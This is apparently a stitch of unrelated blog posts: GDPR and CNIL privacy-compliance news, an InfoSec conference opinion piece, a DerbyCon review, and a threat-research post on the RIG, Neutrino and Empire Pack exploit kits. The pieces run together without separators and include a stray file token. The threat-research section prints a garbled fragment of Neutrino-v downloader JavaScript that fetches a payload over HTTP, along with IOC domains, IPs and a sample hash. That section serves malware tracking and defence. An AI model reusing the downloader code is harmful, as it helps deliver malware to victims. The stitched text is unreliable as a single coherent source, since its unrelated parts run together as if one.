  • The compliance pack is intended to raise awareness amongst the automotive sector’s economic operators of the transparency and fairness principles when collecting personal data. Accordingly, operators should at least provide notice to individuals and even seek their consent. The CNIL recognized, however, that implementing an opt-in mechanism each time the vehicle is started may affect the driving experience. The data processing rules should be defined on a case-by-case basis, taking into account the scenario adopted, the type of data collected and users’ legitimate expectations.
  • Operators should adopt a Privacy by Design approach. This may include the implementation of easily configurable dashboards in order to ensure that individuals keep control over their data.
  • The CNIL encourages stakeholders to prefer the “IN -> IN” scenario that involves processing personal data locally, within the vehicle.

Compliance packs are a new toolkit developed by the CNIL to identify and disseminate best practices in a specific sector while simplifying the formalities to register the data processing for organizations that comply with such practices. They assist various stakeholders in the industry to prepare for the GDPR.

Everyone is wrong about conferences

In the past couple of years there have been many blog posts and articles on the topics of what’s wrong with InfoSec and hacker conferences, which events are or are not relevant, and what’s wrong with the talks and panels at those conferences.  A lot of good points have been raised, and some great ideas have been floated.file00029400867

But they are all wrong.

Many of them aren’t just wrong, they’re also symptomatic of some of the things wrong with InfoSec, a failure to understand the importance of context and perspective.

Let’s start with this simple fact:

Your experience is unique, it is not not universal.  Your perspective is therefore not a universal perspective.

As with anyone offering The One True Answer to any question, allow me to suggest that It Isn’t That Simple.

In upcoming posts I’ll dig into a few of theses topics, not to give The One True Answer, but to share some of my experiences and perspectives, and float a few ideas of my own.  I don’t claim to be an expert on conferences or presentations (or much of anything else), but I am and have been involved in a lot of conferences- as an attendee, participant, program committee member, organizer, volunteer, vendor booth staff, speaker, and even bartender.  I also participate in events large and small, commercial and community, business- and hacker-centric.

And I have opinions.  You may have noticed.

Stay tuned.



CIPL and its GDPR Project Stakeholders Discuss DPOs and Risk under GDPR

In September, the Centre for Information Policy Leadership (“CIPL”) held its second GDPR Workshop in Paris as part of its two-year GDPR Implementation Project. The purpose of the project is to provide a forum for stakeholders to promote EU-wide consistency in implementing the GDPR, encourage forward-thinking and future-proof interpretations of key GDPR provisions, develop and share relevant best practices, and foster a culture of trust and collaboration between regulators and industry.  

Since the inaugural workshop in March 2016 in Amsterdam, participation in the project has grown significantly. The workshop was attended by almost 120 delegates from businesses, 12 data protection authorities (“DPAs”), four EU Member State governments, the EU Commission and the European Data Protection Supervisor, a non-DPA regulator, several academics and the IAPP. The fact that now over 70 companies are involved in this project speaks to the importance of the topic and the need to coordinate and benchmark among impacted stakeholders across the various sectors, in light of the tight deadline of May 25, 2018, when the GDPR becomes fully applicable.

The Paris workshop focused on two key areas under the GDPR: the role of the data protection officer (“DPO”) and the risk-based approach in the application of the GDPR (i.e., in connection with data protection impact assessments (“DPIAs”)). Both reflect key priorities of the Article 29 Working Party (“Working Party”) for developing its own GDPR implementation guidance, as well as the high importance of these two areas for the industry. Additional topics will be covered in future phases of the CIPL project.

Overall, the discussions of the day were a productive mix of a reality check, a wake-up call and encouragement. Particularly promising were instances of emerging consensus around several key implementation questions. While the discussions illustrated how many provisions under the GDPR remain unclear and how much work is left to be done before the quickly approaching implementation deadline, it was reassuring that no one seemed to be slow-pedaling their respective implementation responsibilities. Instead, we saw concentrated energy and commitment from all sides. There was a sense of shared responsibility for the successful and timely implementation of the GDPR between industry, DPAs, national governments and the EU Commission. Finally, it was also recognized that the lines of communication between regulators, industry and other stakeholders should stay open to ensure the best outcome for everybody.

Forthcoming Working Party GDPR Guidance

We learned that the Working Party will be releasing its first round of GDPR guidance before the end of the year or, at the latest, beginning of 2017, on data portability and the role of the DPO. Subsequently, the Working Party plans to release guidance on risk, DPIAs and certifications. Also, the Working Party is on the verge of publishing the report from its first GDPR “FabLab” meeting in July 2016.

The GDPR Represents a Revolution, Not an Evolution

A non-private sector participant also posited that the GDPR represents more of an “evolution” than a “revolution.” The predominant view, however, expressed not only by industry, was that “revolution” was the more accurate term. The familiar concepts of the GDPR will have to be interpreted against a backdrop of a changing technological and digital environment. Also, many of the new obligations for industry and DPAs will require a comprehensive retooling of organizational privacy programs and regulatory enforcement structures, among other changes. Participants stressed the need for timely guidance, frequent updates and full transparency from both DPAs and EU Member States during the implementation process.

EU Member States and DPAs Are Pressing Forward on National Implementation

A tour de table by all present EU Member State representatives and DPAs to update on their progress on national implementation of the GDPR drove home the sheer magnitude and complexity of the involved tasks. They included (1) reviewing the existing data protection laws and updating them in light of the GDPR; (2) coordinating among relevant government bodies; (3) considering how to deal with the margin of maneuver for EU Member States under the GDPR in various clauses; (4) resourcing and restructuring the DPAs for their expanded responsibilities; (5) developing implementation guidance; and (6) coordinating across EU Member States, for example via the Working Party and the European Commission.

The public sector delegates, who are personally involved in the national implementation and transition work, are keenly aware of the challenges facing the industry as it tries to come into compliance by May 2018. Among other things, these representatives pointed to corporate budget cycles that define and circumscribe the resources that will be available for GDPR implementation over the next 20 months even though the necessary resources cannot properly be calculated given the uncertainties of what the GDPR requires.

The Role of the DPO

The first main discussion of the day concerned the practical implementation of the new DPO obligations. Some of the key takeaways on which there appeared to be general agreement amongst a plurality of the present stakeholders included the following:

  • The GDPR expands the traditional compliance function of a data protection officer to a broader, more strategic role, including that of business advisor on the responsible and innovative use of personal data. Given the various functions and skill-sets that must be combined in the DPO, they can be described as a chef d’orchestre with respect to an organization’s strategic use, management and protection of personal data. Certainly, the DPO should not be viewed as an internal “police officer”; a “privacy champion” might be a more fitting description.
  • The DPO must be one person who is responsible for data protection within the organization, but the relevant DPO skills and expertise required by the GDPR can be drawn from the entire DPO team across multiple jurisdictions. “Cloud expertise is good, cloud responsibility is not good,” one of the DPAs noted.
  • A non-mandatory (or voluntary) DPO appointed under Article 37(4) must meet all of the DPO requirements of the GDPR.
  • Some organizations may not wish to appoint a DPO if they are not legally required to do so under the GDPR. If an organization that is not legally required to appoint a mandatory DPO under the GDPR nevertheless wishes to create a data protection role or function within the organization outside of the GDPR requirements, it must give that role or function a different name, such as “Chief Privacy Officer,” or “Data Protection Director or Lead.” (The title of “Data Protection Officer” has now been claimed by the GDPR).
  • Generally, DPAs should find ways to incentivize the appointment of a DPO or a person with equivalent responsibilities for all organizations, including SMEs and start-ups.
  • The criteria of “core activities,” “regular and systematic monitoring” and “large scale” as triggers for mandatory DPO appointment under the GDPR cannot easily be further clarified and defined by additional objective, external criteria. For the most part, their application must be flexible and context-specific and left to the judgment of the organization deciding whether a DPO is required, keeping in mind that organizations must be able to demonstrate and justify their decisions.
  • Core activitiesdoes not include monitoring of employees or other parties on the company’s premises (IT monitoring and/or video surveillance), including monitoring of company emails, assets and systems for security purposes; the use of analytic tools for purposes, such as understanding customers’ use of online products or to improve products or workforce allocation; and activities required by law.
  • It does not matter where the DPO is located geographically as long as there is effective implementation of the GDPR requirements, including those relating to the organizational reporting lines pertaining to the DPO and the requirements relating to DPO accessibility to individuals and DPOs.
  • A DPO does not need to be in the location of the organization’s main establishment and lead supervisory authority.
  • Accessibility of the DPO to individuals can be provided via local DPO staff or technology.
  • The GDPR does not provide for personal liability of the DPO. This makes sense in light of the fact that, under the GDPR, the DPO is, in essence, an internal advisor and the controller is responsible for data protection decisions. Most participants agreed that imposing personal liability on DPOs would not be helpful. However, EU Member States’ law (such as criminal or corporate law) could impose additional liability or penalties.
  • It is not the DPAs’ responsibility to create or impose further DPO qualification standards or certifications. To the extent DPO certifications are desired, they should be developed by the market. Universities could play a role. However, DPAs have a role in encouraging such certifications and helping to create networks of DPOs.
  • Formal certification should not be required for DPOs; instead, hiring organizations should be able to use their judgement and consider the general experience and knowledge of a DPO candidate on a case-by-case basis.
  • An external DPO could be a legal person; however, an individual has to be the main contact.
  • External DPOs are a valid choice for SMEs and start-ups.
  • The DPO’s task of “monitoring compliance” within an organization is not a formal audit function that could potentially be at odds with the task of “advising” the organization, but refers to the DPO’s obligation to oversee and ensure on an ongoing basis that the organization implements all applicable GDPR requirements.
  • The DPO’s “consultationrole with respect to the DPAs (including “prior consultation” regarding high-risk activities) is important, but there is an expectation on the part of DPAs that such consultations are the exception rather than the rule. DPAs are not resourced for frequent consultations. On the other hand, industry confirmed that there is a need for on-going informal consultation and constructive dialogue between the DPO and the DPA. This should be encouraged by both sides.

Risk, High-Risk and DPIAs

The second major issue of the day was the role of risk under the GDPR. Specifically, participants discussed possible interpretations and further guidance relating to the nature and methodology of risk assessments, including in connection with DPIAs. Key takeaway and messages included the following:

  • There was consensus that considering the benefits of a data processing activity should be part of a GDPR risk assessment. Benefits are relevant both in the context of devising appropriate mitigations (so as to avoid mitigating the benefits away) and when deciding whether to proceed with processing, given the residual risk.
  • Article 35(1) provides that DPIAs are only required once with respect to “similar processing operations that present similar risks.” This is designed to prevent unnecessary and duplicative DPIAs. Any further guidance on DPIAs should highlight this important feature and clarify its meaning and application.
  • Article 35(3) sets forth three apparent “defaulthigh-risk categories that automatically require a DPIA. A question was raised as to whether this “high-risk” classification can be rebutted based on the “nature, scope, context and purposes” (Article 35(1)) of the proposed processing at issue before reaching the DPIA stage. Future guidance might address this question.
  • Using new technology” cannot be the sole trigger for “high-risk” status or a DPIA. This criterion must be coupled with additional “high-risk” triggers that depend on nature, purpose, context and scope of processing. Any future guidance should narrow the scope of what is meant by “new technology.” Otherwise, almost every new data processing activity is captured by it.
  • Further guidance onhigh risk” from the DPA should not be too “bureaucratic.” It should feature characteristics and criteria of “high risk” rather than a list that specifies per se “high-risk” activities. Prior consultation with stakeholders before releasing final guidance on the meaning of “high risk” would be helpful.
  • Flexibility in determining how to score, measure and weigh the risks and benefits in a specific processing context is key and should be left to individual organizations. Also, no specific risk assessment process or methodology should be mandated. However, high-level guidance on the general contours of a risk assessment methodology or process might be helpful.
  • The Working Party may base its further guidance on existing DPIA guidance by national DPAs.
  • Considering appropriate mitigations requires taking into account the reasonable expectations of individuals, transparency and the elements of fair processing.
  • Prior consultations” with DPAs regarding DPIAs that demonstrate “high risk” despite mitigations should be the exception rather than the rule.
  • There may be future DPA  guidance on mitigation measures by way of “mitigation scenarios.”
  • Many organizations roll out new products globally without variation between countries. Thus, risk assessments must comprehensively assess the global impact of a product. Any further DPA guidance on the elements and methodology of risk assessment must be workable in that context.
  • The GDPR provides for “seeking the views” of individuals or their representatives in the context of a DPIA “where appropriate.” This obligation must be limited by the organizations’ commercial interests, IP rights and security considerations. Future DPIA guidance should acknowledge that under common product roll-out practices, for example, there may not be an opportunity for prior consultation with individuals before such roll-out. However, in some circumstances feedback from individuals, including on user experience, may be obtained during pre-roll-out limited testing phases.
  • The original intent behind the risk-based approach was to enable broader, but more accountable, use of personal data. If the GDPR’s risk-based approach is implemented in an overly bureaucratic fashion, it runs the risk of merely adding compliance obligations without any corresponding benefits in terms of effective, innovative and accountable data use.

Risk-based Enforcement and Oversight by the DPAs

Workshop participants also considered how the risk-based approach might enable more effective data protection oversight and enforcement by the DPAs. This discussion was designed to kick off a new work stream within CIPL’s GDPR Implementation Project that will specifically explore the issue of “smart regulation.”

In a nutshell, this discussion was premised on the idea that DPAs will not be able to fulfill all the new tasks, powers and functions assigned to them by the GDPR, unless they make choices and set priorities. It was pointed out that while the GDPR does not explicitly ask for prioritization based on strategic importance or impact, DPAs must, nevertheless, make realistic and prudent choices. One mechanism to facilitate such choices would be to apply the risk-based approach to the DPAs’ various tasks and responsibilities, enabling them to prioritize actions according to risk, importance and impact.

By way of an example, the participants considered the DPA’s role as an ombudsman for complaints. This role, arguably, is the least important among the other roles of the DPA, such as “leader,” “authorizer” and “enforcer.” Yet, depending on the volume of complaints (many of which could be of limited importance or merit), the ombudsman role has the potential for monopolizing the time and resources of the DPAs, thereby limiting their ability to perform their other functions effectively.

As mentioned, solutions to this and other problems relating to DPA effectiveness will be the subject of the “smart regulations” works stream. By incorporating the concepts of organizational accountability, the risk-based approach and certifications and codes of conduct, the GDPR’s ambition was to enable organizations to do better in the future, to share the regulatory burden with DPAs and, ultimately, to better protect individuals. Whether all this will be sufficient to obviate the DPAs’ need to prioritize remains to be seen. Better to cover all bases and plan for responsible risk-based prioritization amongst all stakeholders.

Next Steps

To do our part in enabling timely GDPR compliance, CIPL will finalize two white papers and formal recommendations concerning the DPO and risk in the coming weeks and then turn to our next set of priority issues under the regulation, including certifications and codes of conduct, innovation drivers, consent/legitimate interest, transparency and smart regulation.

The next, smaller multistakeholder workshop will be in Brussels on November 8, 2016, on the issue of certifications and codes. Afterwards, the next major GDPR Project workshop will be in February or early March in a European location to be determined.

EDPS Issues Opinion on Coherent Enforcement of Fundamental Rights in the Age of Big Data

On September 23, 2016, the European Data Protection Supervisor (the “EDPS”) released Opinion 8/2016 (the “Opinion”) on the coherent enforcement of fundamental rights in the age of big data. The Opinion updates the EDPS’ Preliminary Opinion on Privacy and Competitiveness in the Age of Big Data, first published in 2014, and provides practical recommendations on how the EU’s objectives and standards can be applied holistically across the EU institutions. According to the EDPS, the Digital Single Market Strategy presents an opportunity for a coherent approach with respect to the application of EU rules on data protection, consumer protection, antitrust enforcement and merger control. In addition, the EDPS calls for greater dialogue and cooperation between data protection, consumer and competition authorities in order to protect the rights and interests of individuals, including the rights to privacy, freedom of expression and non-discrimination.

In particular, the Opinion makes the following recommendations:

  • A digital enforcement clearing house. The EDPS proposes the establishment of a digital clearing house for enforcement in the EU digital sector, which will consist of a voluntary network of contact points in national and EU regulatory authorities responsible for regulation in the digital sector. These authorities must be willing to (1) enhance their respective enforcement activities, with a particular focus on individual rights, and (2) share information and ideas on how to ensure web-based service providers are held accountable for their conduct. The Digital Clearing House could, among other tasks, discuss the legal regime for pursuing specific cases or complaints related to online services, identify potential opportunities to raise awareness at the European level, and assess the impact of sanctions and remedies on individuals’ digital rights and interests.
  • An EU values-based common area on the web. According to the EDPS, EU institutions should, with the help of external experts, explore the creation of a common area on the web where individuals are able to interact without being tracked, in line with the EU Charter of Fundamental Rights (the “EU Charter”). In addition, EU institutions should also encourage the development and application of technical solutions to respect individuals’ expresses preferences with respect to privacy.
  • Improve representation of the individual’s interest in big data mergers. The EDPS supports greater scrutiny of proposed acquisitions of digital companies that have gathered significant quantities of personal data. In addition, according to the EDPS, Council Regulation No. 139/2004 of January 2004, on the control of concentrations between undertakings, should be interpreted and amended in the future to protect the rights to privacy, data protection and freedom of expression online as provided for in the EU Charter.

CISPE Unveils Cloud Providers Code of Conduct

On September 27, 2016, Cloud Infrastructure Services Providers in Europe (“CISPE”) published its Data Protection Code of Conduct (the “Code”). CISPE, a relatively new coalition of more than 20 cloud infrastructure providers with operations in Europe, has focused the Code on transparency and compliance with EU data protection laws.

Highlights of the code include:

  • a requirement that cloud customers are offered the ability to process and store their data exclusively within the EEA;
  • “Trust Mark” awarded to compliant cloud infrastructure providers, and listing on CISPE website; and
  • a prohibition on the use of customers’ personal data for cloud infrastructure service providers’ own benefit or the sale of such data to third parties.

Currently, cloud infrastructure service providers may demonstrate their compliance with the Code either by certification from independent third-party auditors or by self-certifying compliance. Customers may verify the service provider’s compliance through the CISPE website.

CISPE claims that the Code is based on internationally recognized security standards and is compliant with the requirements of the EU’s General Data Protection Regulation, which comes into force across all EU Member States in May 2018.


DerbyCon was fantastic again this year, with talks from some of the best and brightest in NetSec. If you're not familiar with it, it's been held each year in September in Louisville, Kentucky since 2011. Admission to the conference (3 days) is only $175.00, and there are (relatively) inexpensive training classes held the previous two days before the con. If you've never been to a hacker conference, I highly recommend DerbyCon. The atmosphere is very friendly and helpful, and even someone brand new to NetSec can find plenty to learn and participate in.There is a lock pick village, a hardware hacking village, a SOHO router hacking room, a Capture The Flag contest and lots more, as well as official parties Friday and Saturday nights. This was my fifth year attending, and it gets better each time.
All the talks are recorded and available on Adrian Crenshaw's web site. This years talks are at:

RIG evolves, Neutrino waves goodbye, Empire Pack appears

  Neutrino waves Goodbye

Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.

Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016

RIG += internal TDS :

Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]
I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me)

Picture2: Blackhole - 2012 - Internal TDS illustration

but disappeared from the market with the end of Nuclear Pack

Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration

and Angler EK

Picture 4 : Angler EK - Internal TDS illustration

This is a key feature for load seller. It is making their day to day work with traffic provider far easier .
It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.

Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).

Picture 5: A Sutra TDS in action in 2012 - cf The path to infection

RIG += RC4 encryption, dll drop and CVE-2016-0189:

Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.
A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189

Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo

Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.

Neutrino waves goodbye ?

On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :
“we are closed. no new rents, no extends more”
This explains a lot. Here are some of my last Neutrino pass for past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp

As you can see several actors were still using it…Now here is what i get for the past days :
Picture 9: Past days in DriveBy land
Not shown here, Magnitude is still around, mostly striking in Asia

Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.

Picture 10: Last banner for Neutrino as of 2016-09-16

Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.
Side reminder : Neutrino disappeared from march 2014 till november 2014

A Neutrino Variant

Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino.

Picture 11: Neutrino-v pass on the 2016-09-21

Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits

Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder
Note the pnw26 with no associated binary data, the rubbish and additionalInfo

A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523

Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api

 function k2(k) {
var y = a(e + "." + e + "Request.5.1");
y.setProxy(n);"GET", k(1), n);
y.Option(n) = k(2);
if (200 == y.status) return Rf(y.responseText, k(n))
Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)

I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it)

Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
The actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.

Empire Pack:

Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised.

Picture 15: King of Loads - Empire Pack Panel

Some might feel this interface quite familiar…A look a the favicon will give you a hint

Picture 16: RIG EK favicon on Empire Pack panel

Picture 17: RIG Panel

It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.
I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections.
RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIG
  • api.php : historical RIG
  • api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
  • remote_api.php : RIG-v
But Empire Pack might be api3, remote_api, or a bit of both of them.

By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing)


Let’s just conclude this post with statistics pages of two Neutrino threads

Picture 18: Neutrino stats - Aus focused thread - 2016-07-15

Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09

We will be known forever by the tracks we leave
Santee Sioux Tribe

Some IOCs

2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)
2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector


Thanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.


2016-10-03 :
Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.
Added explanation about the IP whitelisting on RIG API (it was not clear)
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.

RIG panel
The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)

RIG-E Behavioral
RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.

2016-12-03 RIG-v Pre-landing

Read More

RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05